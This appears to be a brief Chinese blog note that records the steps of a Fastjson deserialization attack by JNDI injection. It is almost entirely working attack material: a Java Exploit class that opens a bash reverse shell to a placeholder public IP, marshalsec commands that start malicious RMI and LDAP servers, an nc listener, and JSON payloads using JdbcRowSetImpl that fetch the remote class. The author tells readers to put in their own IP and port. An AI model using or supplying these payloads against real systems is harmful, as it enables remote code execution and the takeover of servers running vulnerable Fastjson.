目錄
如下文章說得很不詳細,只是用於記錄我的步驟,初次利用的人,建議找別的博客文章學習。
-
准備一台公網服務器
cd test
python -m SimpleHTTPServer 8888 -
javac Exploit.java
里面的ip和端口改成你的
import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.io.IOException;
import java.util.Hashtable;
public class Exploit{
public Exploit() {}
static
{
try {
String[] cmds = System.getProperty("os.name").toLowerCase().contains("win")
? new String[]{"cmd.exe","/c", "calc.exe"}
: new String[]{"bash", "-c", "/bin/bash -i >& /dev/tcp/【公網IP】/7778 0>&1"};
Runtime.getRuntime().exec(cmds);
} catch (Exception e) {
e.printStackTrace();
}
}
public static void main(String[] args) {
Exploit e = new Exploit();
System.out.println("hello world");
}
}
- 上傳到你的公網服務器
Exploit.class
marshalsec-0.0.3-SNAPSHOT-all.jar
# 有2個協議
RMI
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://【公網IP】/#Exploit 7776
LDAP
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://【公網IP】/#Exploit 7776
- 接受反彈shell的地方
nc -lvp 7778
- http請求
# ldap
{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"lysec":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://【公網IP】:7776/Exploit","autoCommit":true}}
# rmi
{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"lysec":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://【公網IP】:7776/Exploit","autoCommit":true}}